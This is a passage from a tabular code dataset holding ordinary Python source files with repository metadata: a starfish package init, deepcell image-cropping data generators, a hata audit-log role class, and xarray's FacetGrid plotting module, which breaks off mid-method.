hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed674c4c205440cb16d99ce07f8f85acd3899de0 | 186 | py | Python | starfish/image/__init__.py | ttung/starfish | 1bd8abf55a335620e4b20abb041f478334714081 | [
"MIT"
] | null | null | null | starfish/image/__init__.py | ttung/starfish | 1bd8abf55a335620e4b20abb041f478334714081 | [
"MIT"
] | null | null | null | starfish/image/__init__.py | ttung/starfish | 1bd8abf55a335620e4b20abb041f478334714081 | [
"MIT"
] | null | null | null | from ._filter import Filter
from ._registration._apply_transform import ApplyTransform
from ._registration._learn_transform import LearnTransform
from ._segmentation import Segmentation
| 37.2 | 58 | 0.88172 |
d2c67d44136721b4374eb1901eaa4ab0c2704ad7 | 22,206 | py | Python | deepcell/image_generators/cropping.py | BioMeasure/deepcell-tf | e8912c9e4a7160900e8d9dc2616a03dfa47fd53f | [
"Apache-2.0"
] | 1 | 2020-12-05T14:59:18.000Z | 2020-12-05T14:59:18.000Z | deepcell/image_generators/cropping.py | BioMeasure/deepcell-tf | e8912c9e4a7160900e8d9dc2616a03dfa47fd53f | [
"Apache-2.0"
] | null | null | null | deepcell/image_generators/cropping.py | BioMeasure/deepcell-tf | e8912c9e4a7160900e8d9dc2616a03dfa47fd53f | [
"Apache-2.0"
] | null | null | null | # Copyright 2016-2020 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/deepcell-tf/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Semantic segmentation data generators with cropping."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import warnings
import numpy as np
from tensorflow.python.keras.preprocessing.image import array_to_img
from deepcell.image_generators import SemanticDataGenerator, SemanticIterator
try:
import scipy
# scipy.linalg cannot be accessed until explicitly imported
from scipy import linalg
# scipy.ndimage cannot be accessed until explicitly imported
from scipy import ndimage
except ImportError:
scipy = None
from deepcell.image_generators import _transform_masks
class CroppingIterator(SemanticIterator):
"""Iterator yielding data from Numpy arrays (X and y).
Args:
train_dict (dict): Consists of numpy arrays for ``X`` and ``y``.
image_data_generator (ImageDataGenerator): For random transformations
and normalization.
batch_size (int): Size of a batch.
min_objects (int): Images with fewer than ``min_objects`` are ignored.
shuffle (bool): Whether to shuffle the data between epochs.
seed (int): Random seed for data shuffling.
data_format (str): A string, one of ``channels_last`` (default)
or ``channels_first``. The ordering of the dimensions in the
inputs. ``channels_last`` corresponds to inputs with shape
``(batch, height, width, channels)`` while ``channels_first``
corresponds to inputs with shape
``(batch, channels, height, width)``.
save_to_dir (str): Optional directory where to save the pictures
being yielded, in a viewable format. This is useful
for visualizing the random transformations being
applied, for debugging purposes.
save_prefix (str): Prefix to use for saving sample
images (if ``save_to_dir`` is set).
save_format (str): Format to use for saving sample images
(if ``save_to_dir`` is set).
crop_size (tuple): Optional parameter specifying size of crop to take from image
"""
def __init__(self,
train_dict,
image_data_generator,
batch_size=1,
shuffle=False,
transforms=['outer-distance'],
transforms_kwargs={},
seed=None,
min_objects=3,
data_format='channels_last',
save_to_dir=None,
save_prefix='',
save_format='png',
crop_size=None):
super(CroppingIterator, self).__init__(
train_dict=train_dict,
image_data_generator=image_data_generator,
batch_size=batch_size,
shuffle=shuffle,
transforms=transforms,
transforms_kwargs=transforms_kwargs,
seed=seed,
min_objects=min_objects,
data_format=data_format,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
)
# set output size of image based on crop_size
if crop_size is not None:
output_size = crop_size
else:
output_size = self.x.shape[1:3] if self.channel_axis == 3 else self.x.shape[2:4]
self.output_size = output_size
def _get_batches_of_transformed_samples(self, index_array):
# set output size based on output shape and # of channels
if self.channel_axis == 3:
x_shape = tuple([len(index_array)] + list(self.output_size) + [self.x.shape[3]])
else:
x_shape = tuple([len(index_array)] + [self.x.shape[1]] + list(self.output_size))
batch_x = np.zeros(x_shape, dtype=self.x.dtype)
batch_y = []
for i, j in enumerate(index_array):
x = self.x[j]
# _transform_labels expects batch dimension
y_semantic_list = self._transform_labels(self.y[j:j + 1])
# initialize batch_y
if len(batch_y) == 0:
for ys in y_semantic_list:
if self.data_format == 'channels_first':
shape = tuple([len(index_array), ys.shape[1]] + list(self.output_size))
else:
shape = tuple([len(index_array)] + list(self.output_size) + [ys.shape[-1]])
batch_y.append(np.zeros(shape, dtype=ys.dtype))
# random_transform does not expect batch dimension
y_semantic_list = [ys[0] for ys in y_semantic_list]
# Apply transformation
x, y_semantic_list = self.image_data_generator.random_transform(
x, y_semantic_list)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
for k, ys in enumerate(y_semantic_list):
batch_y[k][i] = ys
if self.save_to_dir:
for i, j in enumerate(index_array):
if self.data_format == 'channels_first':
img_x = np.expand_dims(batch_x[i, 0, ...], 0)
else:
img_x = np.expand_dims(batch_x[i, ..., 0], -1)
img = array_to_img(img_x, self.data_format, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(
prefix=self.save_prefix,
index=j,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
if self.y is not None:
# Save argmax of y batch
for k, y_sem in enumerate(batch_y):
if y_sem[i].shape[self.channel_axis - 1] == 1:
img_y = y_sem[i]
else:
img_y = np.argmax(y_sem[i],
axis=self.channel_axis - 1)
img_y = np.expand_dims(img_y,
axis=self.channel_axis - 1)
img = array_to_img(img_y, self.data_format, scale=True)
fname = 'y_{sem}_{prefix}_{index}_{hash}.{format}'.format(
sem=k,
prefix=self.save_prefix,
index=j,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
return batch_x, batch_y
class CroppingDataGenerator(SemanticDataGenerator):
"""Generates batches of tensor image data with real-time data augmentation.
The data will be looped over (in batches).
Args:
ffeaturewise_center (bool): Set input mean to 0 over the dataset,
feature-wise.
samplewise_center (bool): Set each sample mean to 0.
featurewise_std_normalization (bool): Divide inputs by std
of the dataset, feature-wise.
samplewise_std_normalization (bool): Divide each input by its std.
zca_epsilon (float): Epsilon for ZCA whitening. Default is 1e-6.
zca_whitening (bool): Apply ZCA whitening.
rotation_range (int): Degree range for random rotations.
width_shift_range (float): 1-D array-like or int
- float: fraction of total width, if < 1, or pixels if >= 1.
- 1-D array-like: random elements from the array.
- int: integer number of pixels from interval
``(-width_shift_range, +width_shift_range)``
- With ``width_shift_range=2`` possible values are integers
``[-1, 0, +1]``, same as with ``width_shift_range=[-1, 0, +1]``,
while with ``width_shift_range=1.0`` possible values are floats
in the interval [-1.0, +1.0).
height_shift_range: Float, 1-D array-like or int
- float: fraction of total height, if < 1, or pixels if >= 1.
- 1-D array-like: random elements from the array.
- int: integer number of pixels from interval
``(-height_shift_range, +height_shift_range)``
- With ``height_shift_range=2`` possible values
are integers ``[-1, 0, +1]``,
same as with ``height_shift_range=[-1, 0, +1]``,
while with ``height_shift_range=1.0`` possible values are floats
in the interval [-1.0, +1.0).
shear_range (float): Shear Intensity
(Shear angle in counter-clockwise direction in degrees)
zoom_range (float): float or [lower, upper], Range for random zoom.
If a float, ``[lower, upper] = [1-zoom_range, 1+zoom_range]``.
channel_shift_range (float): range for random channel shifts.
fill_mode (str): One of {"constant", "nearest", "reflect" or "wrap"}.
Default is 'nearest'. Points outside the boundaries of the input
are filled according to the given mode:
- 'constant': kkkkkkkk|abcd|kkkkkkkk (cval=k)
- 'nearest': aaaaaaaa|abcd|dddddddd
- 'reflect': abcddcba|abcd|dcbaabcd
- 'wrap': abcdabcd|abcd|abcdabcd
cval (float): Value used for points outside the boundaries
when ``fill_mode = "constant"``.
horizontal_flip (bool): Randomly flip inputs horizontally.
vertical_flip (bool): Randomly flip inputs vertically.
rescale: rescaling factor. Defaults to None. If None or 0, no rescaling
is applied, otherwise we multiply the data by the value provided
(before applying any other transformation).
preprocessing_function: function that will be implied on each input.
The function will run after the image is resized and augmented.
The function should take one argument:
one image (Numpy tensor with rank 3),
and should output a Numpy tensor with the same shape.
data_format (str): A string, one of ``channels_last`` (default)
or ``channels_first``. The ordering of the dimensions in the
inputs. ``channels_last`` corresponds to inputs with shape
``(batch, height, width, channels)`` while ``channels_first``
corresponds to inputs with shape
``(batch, channels, height, width)``.
validation_split (float): Fraction of images reserved for validation
(strictly between 0 and 1).
"""
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-6,
rotation_range=0,
width_shift_range=0.,
height_shift_range=0.,
brightness_range=None,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
data_format='channels_last',
validation_split=0.0,
interpolation_order=1,
crop_size=None,
dtype='float32'):
super(CroppingDataGenerator, self).__init__(
featurewise_center=featurewise_center,
samplewise_center=samplewise_center,
featurewise_std_normalization=featurewise_std_normalization,
samplewise_std_normalization=samplewise_std_normalization,
zca_whitening=zca_whitening,
zca_epsilon=zca_epsilon,
rotation_range=rotation_range,
width_shift_range=width_shift_range,
height_shift_range=height_shift_range,
brightness_range=brightness_range,
shear_range=shear_range,
zoom_range=zoom_range,
channel_shift_range=channel_shift_range,
fill_mode=fill_mode,
cval=cval,
horizontal_flip=horizontal_flip,
vertical_flip=vertical_flip,
rescale=rescale,
preprocessing_function=preprocessing_function,
data_format=data_format,
validation_split=validation_split,
dtype=dtype)
if crop_size is not None:
if not isinstance(crop_size, (tuple, list)):
raise ValueError("Crop size must be a list or tuple of row/col dimensions")
self.crop_size = crop_size
# tensorflow does not initialize interpolation_order, so we'll do it here
self.interpolation_order = interpolation_order
def flow(self,
train_dict,
batch_size=1,
transforms=['outer-distance'],
transforms_kwargs={},
min_objects=3,
shuffle=True,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png'):
"""Generates batches of augmented/normalized data with given arrays.
Args:
train_dict (dict): Consists of numpy arrays for ``X`` and ``y``.
batch_size (int): Size of a batch. Defaults to 1.
shuffle (bool): Whether to shuffle the data between epochs.
Defaults to ``True``.
seed (int): Random seed for data shuffling.
min_objects (int): Minumum number of objects allowed per image
save_to_dir (str): Optional directory where to save the pictures
being yielded, in a viewable format. This is useful
for visualizing the random transformations being
applied, for debugging purposes.
save_prefix (str): Prefix to use for saving sample
images (if ``save_to_dir`` is set).
save_format (str): Format to use for saving sample images
(if ``save_to_dir`` is set).
Returns:
CroppingIterator: An ``Iterator`` yielding tuples of ``(x, y)``,
where ``x`` is a numpy array of image data and ``y`` is list of
numpy arrays of transformed masks of the same shape.
"""
return CroppingIterator(
train_dict,
self,
batch_size=batch_size,
transforms=transforms,
transforms_kwargs=transforms_kwargs,
shuffle=shuffle,
min_objects=min_objects,
seed=seed,
data_format=self.data_format,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
crop_size=self.crop_size)
def get_random_transform(self, img_shape, seed=None):
transform_parameters = super(CroppingDataGenerator, self).get_random_transform(
img_shape=img_shape, seed=seed)
crop_indices = None
if self.crop_size is not None:
img_dims = img_shape[1:] if self.channel_axis == 1 else img_shape[:2]
if img_dims == self.crop_size:
# don't need to crop
pass
elif img_dims[0] == self.crop_size[0] or img_dims[1] == self.crop_size[1]:
raise ValueError('crop_size must be a subset of both axes or exactly '
' equal to image dims')
elif img_dims[0] < self.crop_size[0] or img_dims[1] < self.crop_size[1]:
raise ValueError('Crop dimensions must be smaller than image dimensions')
else:
row_start = np.random.randint(0, img_dims[0] - self.crop_size[0])
col_start = np.random.randint(0, img_dims[1] - self.crop_size[1])
crop_indices = ([row_start, row_start + self.crop_size[0]],
[col_start, col_start + self.crop_size[1]])
transform_parameters['crop_indices'] = crop_indices
return transform_parameters
def apply_transform(self, x, transform_parameters):
if transform_parameters['crop_indices'] is not None:
row_indices, col_indices = transform_parameters['crop_indices']
if self.channel_axis == 1:
x = x[:, row_indices[0]:row_indices[1], col_indices[0]:col_indices[1]]
else:
x = x[row_indices[0]:row_indices[1], col_indices[0]:col_indices[1], :]
x = super(CroppingDataGenerator, self).apply_transform(
x=x, transform_parameters=transform_parameters)
return x
def fit(self, x, augment=False, rounds=1, seed=None):
"""Fits the data generator to some sample data.
This computes the internal data stats related to the
data-dependent transformations, based on an array of sample data.
Only required if `featurewise_center` or
`featurewise_std_normalization` or `zca_whitening` are set to True.
When `rescale` is set to a value, rescaling is applied to
sample data before computing the internal data stats.
Args:
x: Sample data. Should have rank 4.
In case of grayscale data,
the channels axis should have value 1, in case
of RGB data, it should have value 3, and in case
of RGBA data, it should have value 4.
augment: Boolean (default: False).
Whether to fit on randomly augmented samples.
rounds: Int (default: 1).
If using data augmentation (`augment=True`),
this is how many augmentation passes over the data to use.
seed: Int (default: None). Random seed.
"""
x = np.asarray(x, dtype=self.dtype)
if x.ndim != 4:
raise ValueError('Input to `.fit()` should have rank 4. '
'Got array with shape: ' + str(x.shape))
if x.shape[self.channel_axis] not in {1, 3, 4}:
warnings.warn(
'Expected input to be images (as Numpy array) '
'following the data format convention "' +
self.data_format + '" (channels on axis ' +
str(self.channel_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' +
str(self.channel_axis) + '. '
'However, it was passed an array with shape ' +
str(x.shape) + ' (' + str(x.shape[self.channel_axis]) +
' channels).')
if seed is not None:
np.random.seed(seed)
x = np.copy(x)
if self.rescale:
x *= self.rescale
if augment:
# adjust output shape to account for cropping in generator
if self.crop_size is not None:
if self.channel_axis == 1:
x_crop_shape = [x.shape[1]] + list(self.crop_size)
else:
x_crop_shape = list(self.crop_size) + [x.shape[3]]
ax = np.zeros(
tuple([rounds * x.shape[0]] + x_crop_shape),
dtype=self.dtype)
else:
ax = np.zeros(
tuple([rounds * x.shape[0]] + list(x.shape)[1:]),
dtype=self.dtype)
for r in range(rounds):
for i in range(x.shape[0]):
ax[i + r * x.shape[0]] = self.random_transform(x[i])
x = ax
if self.featurewise_center:
self.mean = np.mean(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.mean = np.reshape(self.mean, broadcast_shape)
x -= self.mean
if self.featurewise_std_normalization:
self.std = np.std(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.std = np.reshape(self.std, broadcast_shape)
x /= (self.std + 1e-6)
if self.zca_whitening:
if scipy is None:
raise ImportError('Using zca_whitening requires SciPy. '
'Install SciPy.')
flat_x = np.reshape(
x, (x.shape[0], x.shape[1] * x.shape[2] * x.shape[3]))
sigma = np.dot(flat_x.T, flat_x) / flat_x.shape[0]
u, s, _ = linalg.svd(sigma)
s_inv = 1. / np.sqrt(s[np.newaxis] + self.zca_epsilon)
self.principal_components = (u * s_inv).dot(u.T)
| 43.972277 | 99 | 0.581329 |
1481cf55d238b458c54fbbddd274d7268d33eb1c | 1,225 | py | Python | hata/discord/guild/audit_logs/audit_log_role.py | WizzyBots/hata | f6991afc0bebf7dad932888a536f4d010f8663c7 | [
"0BSD"
] | 1 | 2022-03-02T03:59:57.000Z | 2022-03-02T03:59:57.000Z | hata/discord/guild/audit_logs/audit_log_role.py | m0nk3ybraindead/hata | f87ed3d7009eeae31d6ea158772efd33775c7b1c | [
"0BSD"
] | 1 | 2022-02-08T16:54:39.000Z | 2022-02-08T16:54:39.000Z | hata/discord/guild/audit_logs/audit_log_role.py | WizzyBots/hata | f6991afc0bebf7dad932888a536f4d010f8663c7 | [
"0BSD"
] | null | null | null | __all__ = ('AuditLogRole',)
from ...bases import DiscordEntity
from ...role import Role
class AuditLogRole(DiscordEntity):
"""
Represents a role object received with audit logs.
Parameters
----------
id : `int`
The role's identifier.
name : `str`
The role's name.
"""
__slots__ = ('id', 'name')
def __new__(cls, data):
"""
Creates a new audit log role.
Parameters
----------
data : `dict` of (`str`, `Any`) items
partial role data.
"""
role_id = int(data['id'])
role_name = data.get('name', '')
self = object.__new__(cls)
self.id = role_id
self.name = role_name
return self
def __repr__(self):
"""Returns the role's representation."""
return f'<{self.__class__.__name__} id={self.id!r}, name={self.name!r}>'
@property
def entity(self):
"""
Resolves the audit log role's entity.
If the entity is not cached creates a new.
Returns
-------
role : ``Role``
"""
return Role.precreate(self.id, name=self.name)
| 22.272727 | 80 | 0.502857 |
f133e7806a34b1a1bb2dd83ba412ec53f281d110 | 18,743 | py | Python | xarray/plot/facetgrid.py | visr/xarray | 9e8707d2041cfa038c31fc2284c1fe40bc3368e9 | [
"Apache-2.0"
] | null | null | null | xarray/plot/facetgrid.py | visr/xarray | 9e8707d2041cfa038c31fc2284c1fe40bc3368e9 | [
"Apache-2.0"
] | 1 | 2018-12-05T09:21:17.000Z | 2018-12-05T09:21:17.000Z | xarray/plot/facetgrid.py | visr/xarray | 9e8707d2041cfa038c31fc2284c1fe40bc3368e9 | [
"Apache-2.0"
] | 1 | 2020-05-29T16:17:35.000Z | 2020-05-29T16:17:35.000Z | from __future__ import absolute_import, division, print_function
import functools
import itertools
import warnings
import numpy as np
from ..core.formatting import format_item
from ..core.pycompat import getargspec
from .utils import (
_determine_cmap_params, _infer_xy_labels, import_matplotlib_pyplot,
label_from_attrs)
# Overrides axes.labelsize, xtick.major.size, ytick.major.size
# from mpl.rcParams
_FONTSIZE = 'small'
# For major ticks on x, y axes
_NTICKS = 5
def _nicetitle(coord, value, maxchar, template):
"""
Put coord, value in template and truncate at maxchar
"""
prettyvalue = format_item(value, quote_strings=False)
title = template.format(coord=coord, value=prettyvalue)
if len(title) > maxchar:
title = title[:(maxchar - 3)] + '...'
return title
class FacetGrid(object):
"""
Initialize the matplotlib figure and FacetGrid object.
The :class:`FacetGrid` is an object that links a xarray DataArray to
a matplotlib figure with a particular structure.
In particular, :class:`FacetGrid` is used to draw plots with multiple
Axes where each Axes shows the same relationship conditioned on
different levels of some dimension. It's possible to condition on up to
two variables by assigning variables to the rows and columns of the
grid.
The general approach to plotting here is called "small multiples",
where the same kind of plot is repeated multiple times, and the
specific use of small multiples to display the same relationship
conditioned on one ore more other variables is often called a "trellis
plot".
The basic workflow is to initialize the :class:`FacetGrid` object with
the DataArray and the variable names that are used to structure the grid.
Then plotting functions can be applied to each subset by calling
:meth:`FacetGrid.map_dataarray` or :meth:`FacetGrid.map`.
Attributes
----------
axes : numpy object array
Contains axes in corresponding position, as returned from
plt.subplots
fig : matplotlib.Figure
The figure containing all the axes
name_dicts : numpy object array
Contains dictionaries mapping coordinate names to values. None is
used as a sentinel value for axes which should remain empty, ie.
sometimes the bottom right grid
"""
def __init__(self, data, col=None, row=None, col_wrap=None,
sharex=True, sharey=True, figsize=None, aspect=1, size=3,
subplot_kws=None):
"""
Parameters
----------
data : DataArray
xarray DataArray to be plotted
row, col : strings
Dimesion names that define subsets of the data, which will be drawn
on separate facets in the grid.
col_wrap : int, optional
"Wrap" the column variable at this width, so that the column facets
sharex : bool, optional
If true, the facets will share x axes
sharey : bool, optional
If true, the facets will share y axes
figsize : tuple, optional
A tuple (width, height) of the figure in inches.
If set, overrides ``size`` and ``aspect``.
aspect : scalar, optional
Aspect ratio of each facet, so that ``aspect * size`` gives the
width of each facet in inches
size : scalar, optional
Height (in inches) of each facet. See also: ``aspect``
subplot_kws : dict, optional
Dictionary of keyword arguments for matplotlib subplots
"""
plt = import_matplotlib_pyplot()
# Handle corner case of nonunique coordinates
rep_col = col is not None and not data[col].to_index().is_unique
rep_row = row is not None and not data[row].to_index().is_unique
if rep_col or rep_row:
raise ValueError('Coordinates used for faceting cannot '
'contain repeated (nonunique) values.')
# single_group is the grouping variable, if there is exactly one
if col and row:
single_group = False
nrow = len(data[row])
ncol = len(data[col])
nfacet = nrow * ncol
if col_wrap is not None:
warnings.warn('Ignoring col_wrap since both col and row '
'were passed')
elif row and not col:
single_group = row
elif not row and col:
single_group = col
else:
raise ValueError(
'Pass a coordinate name as an argument for row or col')
# Compute grid shape
if single_group:
nfacet = len(data[single_group])
if col:
# idea - could add heuristic for nice shapes like 3x4
ncol = nfacet
if row:
ncol = 1
if col_wrap is not None:
# Overrides previous settings
ncol = col_wrap
nrow = int(np.ceil(nfacet / ncol))
# Set the subplot kwargs
subplot_kws = {} if subplot_kws is None else subplot_kws
if figsize is None:
# Calculate the base figure size with extra horizontal space for a
# colorbar
cbar_space = 1
figsize = (ncol * size * aspect + cbar_space, nrow * size)
fig, axes = plt.subplots(nrow, ncol,
sharex=sharex, sharey=sharey, squeeze=False,
figsize=figsize, subplot_kw=subplot_kws)
# Set up the lists of names for the row and column facet variables
col_names = list(data[col].values) if col else []
row_names = list(data[row].values) if row else []
if single_group:
full = [{single_group: x} for x in
data[single_group].values]
empty = [None for x in range(nrow * ncol - len(full))]
name_dicts = full + empty
else:
rowcols = itertools.product(row_names, col_names)
name_dicts = [{row: r, col: c} for r, c in rowcols]
name_dicts = np.array(name_dicts).reshape(nrow, ncol)
# Set up the class attributes
# ---------------------------
# First the public API
self.data = data
self.name_dicts = name_dicts
self.fig = fig
self.axes = axes
self.row_names = row_names
self.col_names = col_names
# Next the private variables
self._single_group = single_group
self._nrow = nrow
self._row_var = row
self._ncol = ncol
self._col_var = col
self._col_wrap = col_wrap
self._x_var = None
self._y_var = None
self._cmap_extend = None
self._mappables = []
self._finalized = False
@property
def _left_axes(self):
return self.axes[:, 0]
@property
def _bottom_axes(self):
return self.axes[-1, :]
def map_dataarray(self, func, x, y, **kwargs):
"""
Apply a plotting function to a 2d facet's subset of the data.
This is more convenient and less general than ``FacetGrid.map``
Parameters
----------
func : callable
A plotting function with the same signature as a 2d xarray
plotting method such as `xarray.plot.imshow`
x, y : string
Names of the coordinates to plot on x, y axes
kwargs :
additional keyword arguments to func
Returns
-------
self : FacetGrid object
"""
cmapkw = kwargs.get('cmap')
colorskw = kwargs.get('colors')
cbar_kwargs = kwargs.pop('cbar_kwargs', {})
cbar_kwargs = {} if cbar_kwargs is None else dict(cbar_kwargs)
if kwargs.get('cbar_ax', None) is not None:
raise ValueError('cbar_ax not supported by FacetGrid.')
# colors is mutually exclusive with cmap
if cmapkw and colorskw:
raise ValueError("Can't specify both cmap and colors.")
# These should be consistent with xarray.plot._plot2d
cmap_kwargs = {'plot_data': self.data.values,
# MPL default
'levels': 7 if 'contour' in func.__name__ else None,
'filled': func.__name__ != 'contour',
}
cmap_args = getargspec(_determine_cmap_params).args
cmap_kwargs.update((a, kwargs[a]) for a in cmap_args if a in kwargs)
cmap_params = _determine_cmap_params(**cmap_kwargs)
if colorskw is not None:
cmap_params['cmap'] = None
# Order is important
func_kwargs = kwargs.copy()
func_kwargs.update(cmap_params)
func_kwargs.update({'add_colorbar': False, 'add_labels': False})
# Get x, y labels for the first subplot
x, y = _infer_xy_labels(
darray=self.data.loc[self.name_dicts.flat[0]], x=x, y=y,
imshow=func.__name__ == 'imshow', rgb=kwargs.get('rgb', None))
for d, ax in zip(self.name_dicts.flat, self.axes.flat):
# None is the sentinel value
if d is not None:
subset = self.data.loc[d]
mappable = func(subset, x, y, ax=ax, **func_kwargs)
self._mappables.append(mappable)
self._cmap_extend = cmap_params.get('extend')
self._finalize_grid(x, y)
if kwargs.get('add_colorbar', True):
self.add_colorbar(**cbar_kwargs)
return self
def map_dataarray_line(self, x=None, y=None, hue=None, **kwargs):
"""
Apply a line plot to a 2d facet subset of the data.
Parameters
----------
x, y, hue: string
dimension names for the axes and hues of each facet
Returns
-------
self : FacetGrid object
"""
from .plot import line, _infer_line_data
add_legend = kwargs.pop('add_legend', True)
kwargs['add_legend'] = False
for d, ax in zip(self.name_dicts.flat, self.axes.flat):
# None is the sentinel value
if d is not None:
subset = self.data.loc[d]
mappable = line(subset, x=x, y=y, hue=hue,
ax=ax, _labels=False,
**kwargs)
self._mappables.append(mappable)
_, _, hueplt, xlabel, ylabel, huelabel = _infer_line_data(
darray=self.data.loc[self.name_dicts.flat[0]],
x=x, y=y, hue=hue)
self._hue_var = hueplt
self._hue_label = huelabel
self._finalize_grid(xlabel, ylabel)
if add_legend and hueplt is not None and huelabel is not None:
self.add_legend()
return self
def _finalize_grid(self, *axlabels):
"""Finalize the annotations and layout."""
if not self._finalized:
self.set_axis_labels(*axlabels)
self.set_titles()
self.fig.tight_layout()
for ax, namedict in zip(self.axes.flat, self.name_dicts.flat):
if namedict is None:
ax.set_visible(False)
self._finalized = True
def add_legend(self, **kwargs):
figlegend = self.fig.legend(
handles=self._mappables[-1],
labels=list(self._hue_var.values),
title=self._hue_label,
loc="center right", **kwargs)
# Draw the plot to set the bounding boxes correctly
self.fig.draw(self.fig.canvas.get_renderer())
# Calculate and set the new width of the figure so the legend fits
legend_width = figlegend.get_window_extent().width / self.fig.dpi
figure_width = self.fig.get_figwidth()
self.fig.set_figwidth(figure_width + legend_width)
# Draw the plot again to get the new transformations
self.fig.draw(self.fig.canvas.get_renderer())
# Now calculate how much space we need on the right side
legend_width = figlegend.get_window_extent().width / self.fig.dpi
space_needed = legend_width / (figure_width + legend_width) + 0.02
# margin = .01
# _space_needed = margin + space_needed
right = 1 - space_needed
# Place the subplot axes to give space for the legend
self.fig.subplots_adjust(right=right)
def add_colorbar(self, **kwargs):
"""Draw a colorbar
"""
kwargs = kwargs.copy()
if self._cmap_extend is not None:
kwargs.setdefault('extend', self._cmap_extend)
if 'label' not in kwargs:
kwargs.setdefault('label', label_from_attrs(self.data))
self.cbar = self.fig.colorbar(self._mappables[-1],
ax=list(self.axes.flat),
**kwargs)
return self
def set_axis_labels(self, x_var=None, y_var=None):
"""Set axis labels on the left column and bottom row of the grid."""
if x_var is not None:
if x_var in self.data.coords:
self._x_var = x_var
self.set_xlabels(label_from_attrs(self.data[x_var]))
else:
# x_var is a string
self.set_xlabels(x_var)
if y_var is not None:
if y_var in self.data.coords:
self._y_var = y_var
self.set_ylabels(label_from_attrs(self.data[y_var]))
else:
self.set_ylabels(y_var)
return self
def set_xlabels(self, label=None, **kwargs):
"""Label the x axis on the bottom row of the grid."""
if label is None:
label = label_from_attrs(self.data[self._x_var])
for ax in self._bottom_axes:
ax.set_xlabel(label, **kwargs)
return self
def set_ylabels(self, label=None, **kwargs):
"""Label the y axis on the left column of the grid."""
if label is None:
label = label_from_attrs(self.data[self._y_var])
for ax in self._left_axes:
ax.set_ylabel(label, **kwargs)
return self
def set_titles(self, template="{coord} = {value}", maxchar=30,
**kwargs):
"""
Draw titles either above each facet or on the grid margins.
Parameters
----------
template : string
Template for plot titles containing {coord} and {value}
maxchar : int
Truncate titles at maxchar
kwargs : keyword args
additional arguments to matplotlib.text
Returns
-------
self: FacetGrid object
"""
import matplotlib as mpl
kwargs["size"] = kwargs.pop("size", mpl.rcParams["axes.labelsize"])
nicetitle = functools.partial(_nicetitle, maxchar=maxchar,
template=template)
if self._single_group:
for d, ax in zip(self.name_dicts.flat, self.axes.flat):
# Only label the ones with data
if d is not None:
coord, value = list(d.items()).pop()
title = nicetitle(coord, value, maxchar=maxchar)
ax.set_title(title, **kwargs)
else:
# The row titles on the right edge of the grid
for ax, row_name in zip(self.axes[:, -1], self.row_names):
title = nicetitle(coord=self._row_var, value=row_name,
maxchar=maxchar)
ax.annotate(title, xy=(1.02, .5), xycoords="axes fraction",
rotation=270, ha="left", va="center", **kwargs)
# The column titles on the top row
for ax, col_name in zip(self.axes[0, :], self.col_names):
title = nicetitle(coord=self._col_var, value=col_name,
maxchar=maxchar)
ax.set_title(title, **kwargs)
return self
def set_ticks(self, max_xticks=_NTICKS, max_yticks=_NTICKS,
fontsize=_FONTSIZE):
"""
Set and control tick behavior
Parameters
----------
max_xticks, max_yticks : int, optional
Maximum number of labeled ticks to plot on x, y axes
fontsize : string or int
Font size as used by matplotlib text
Returns
-------
self : FacetGrid object
"""
